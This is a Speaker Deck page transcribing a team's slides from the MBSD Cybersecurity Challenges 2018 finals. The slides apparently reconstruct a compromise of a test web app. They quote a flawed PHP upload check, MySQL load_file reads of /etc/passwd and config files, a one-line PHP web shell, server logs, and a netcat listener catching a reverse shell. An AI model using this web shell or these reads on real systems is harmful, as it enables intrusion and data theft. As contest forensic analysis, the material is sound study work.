Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
MBSD Cybersecurity Challenges 2018 最終審査会 発表スライド
Search
8ayac
December 12, 2018
Technology
1.9k
0
Share
Embed
Copy iframe code
Copy JS code
Copy link
Start on current slide
MBSD Cybersecurity Challenges 2018 最終審査会 発表スライド
チームIPFactoryとして発表したもの
8ayac
December 12, 2018
More Decks by 8ayac
See All by 8ayac
Free Bugs Campaign
8ayac
0
980
MBSD Cybersecurity Challenges 2017 最終審査会 発表スライド
8ayac
0
660
Other Decks in Technology
See All in Technology
エンジニアリング戦略の作り方 / Crafting Engineering Strategy
iwashi86
18
6.1k
[モダンアプリ勉強会]今更聞けないGit/GitHub入門
tsukuboshi
0
330
2026 TECHFRESH 畢業分享會 - 開發日常大解密!從領域驅動到企業級上線
line_developers_tw
PRO
0
570
SIer20年! 培ったスキルがスタートアップで輝く時
shucho0103
0
810
Kubernetesにおける学習基盤とLLMOpsの概要
ry
1
210
10倍の生産性を実現するAI駆動並列エージェントのすべて
kumaiu
4
1.3k
データ基盤をDataformで整えた話 〜 開発環境を添えて 〜
takapy
0
140
AIソロプレナー時代に2ヶ月で20人増員した事業創造会社の開発組織の話
miyatakoji
0
510
On-behalf-of Token exchange with AgentCore Identity
hironobuiga
2
120
noUncheckedIndexedAccess、3時間、1万円。 / noUncheckedIndexedAccess, 3 Hours, 10,000 JPY.
kaonavi
1
340
Agentic ERPをどう設計するか ー 受発注エージェントを動かす、現場の知見と設計思想ー
recerqainc
1
2.1k
MIERUNE JCT 発表資料「宇宙から伊能忠敬ごっこ」
syuchimu
0
200
Featured
See All Featured
Ruling the World: When Life Gets Gamed
codingconduct
0
250
Why Mistakes Are the Best Teachers: Turning Failure into a Pathway for Growth
auna
0
150
Why Your Marketing Sucks and What You Can Do About It - Sophie Logan
marketingsoph
0
170
Navigating Weather and Climate Data
rabernat
0
220
Tell your own story through comics
letsgokoyo
1
950
Easily Structure & Communicate Ideas using Wireframe
afnizarnur
194
17k
Balancing Empowerment & Direction
lara
6
1.2k
The Impact of AI in SEO - AI Overviews June 2024 Edition
aleyda
5
1.1k
State of Search Keynote: SEO is Dead Long Live SEO
ryanjones
0
200
Helping Users Find Their Own Way: Creating Modern Search Experiences
danielanewman
31
3.2k
Groundhog Day: Seeking Process in Gaming for Health
codingconduct
0
200
Site-Speed That Sticks
csswizardry
13
1.2k
Transcript
MBSD Cybersecurity Challenges 2018
None
None
▋ ▋ ▋ ▋ ▋ ▋
▋ ▋ ▋ ▋ ▋ ▋ ▋ ▋ ▋ ▋
▋ ▋ ▋
▋ ▋ ► ► ► ►
▋ ► ► ► ► ▋ ► ► ►
None
None
sendmessage.php ▋ ▋ ▋ $prefix = md5(time() . $user->id); $tname
= $prefix . basename($_FILES["file"]["name"]); if (move_uploaded_file($_FILES['file']['tmp_name'], "./tmp/".$tname) && preg_match("/^[^.]+¥.jpg$/",$tname)) {
sendmessage.php (2018/9/21 14:46:48) 180921 14:39:24 26247 Connect
[email protected]
on mysql
180921 14:41:06 26247 Query select load_file('/etc/hosts') 180921 14:41:12 26247 Query select load_file('/etc/passwd') 180921 14:42:30 26247 Query select load_file('/etc/issue') 180921 14:42:45 26247 Query select load_file('/etc/httpd/conf/httpd.conf') 180921 14:43:32 26247 Query select load_file('/var/www/html/webmix3/index.php') 180921 14:44:30 26247 Query select load_file('/var/www/html/webmix3/login.php') 180921 14:44:54 26247 Query select load_file('/var/www/html/webmix3/libs.php') 180921 14:45:25 26247 Query select load_file('/var/www/html/webmix3/class/class.php') 180921 14:45:45 26247 Query select load_file('/var/www/html/webmix3/class/User.php') 180921 14:46:48 26247 Query select load_file('/var/www/html/webmix3/sendmessage.php')
Web Shell (2018/9/21 15:12:46) 192.168.11.2 </> </>
Web Shell (2018/9/21 15:12:46) 192.168.11.2 </> </> 7449f92ea0f26445e89ae968227efaabtest.php <?php system($_POST['cmd’]);
Web Shell (2018/9/21 15:12:46) 192.168.11.2 </> </> 7449f92ea0f26445e89ae968227efaabtest.php <?php system($_POST['cmd’]);
[Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Notice: Undefined index: cmd in /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1 [Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Warning: system(): Cannot execute a blank command in /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1
Web Shell (2018/9/21 15:12:46) 192.168.11.2 </> </> 7449f92ea0f26445e89ae968227efaabtest.php <?php system($_POST['cmd’]);
192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
Web Shell (2018/9/21 15:12:46) 192.168.11.2 </> </> 7449f92ea0f26445e89ae968227efaabtest.php <?php system($_POST['cmd’]);
192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0" 192.168.11.204 - - [21/Sep/2018:15:12:46 +0900] "POST /sendmessage.php HTTP/1.1" 200 1783 "http://192.168.11.2/sendmessage.php" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
(2018/9/21 15:29:02) $ nc –lvp 4444 192.168.11.2 </>
(2018/9/21 15:29:02) 192.168.11.2 </> 4444/TCPで待受中…
(2018/9/21 15:29:02) 192.168.11.2 </> 4444/TCPで待受中…
(2018/9/21 15:29:02) 192.168.11.2 </> $ nc -lvp 4444 Listening on
[0.0.0.0] (family 0, port 4444) Connection from 192.168.11.204 64495 received! sh-4.1$
(2018/9/21 15:29:02) 192.168.11.2 </> $ nc -lvp 4444 Listening on
[0.0.0.0] (family 0, port 4444) Connection from 192.168.11.204 64495 received! sh-4.1$ 192.168.11.204 - - [21/Sep/2018:15:29:02 +0900] "POST /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" 192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
None
▋ ▋ ▋
▋ ▋ ▋ POST
▋ ▋ ▋ POST POST
( ) ▋ ► ►
POST ▋ ► ►
None
38
▋ ▋ ▋ ▋ ▋ ▋ ▋
▋ ▋ ▋ ▋ ▋ ▋ ▋
▋ ► ▋ ► ▋ ►
▋ ▋
▋ ► ► ►
None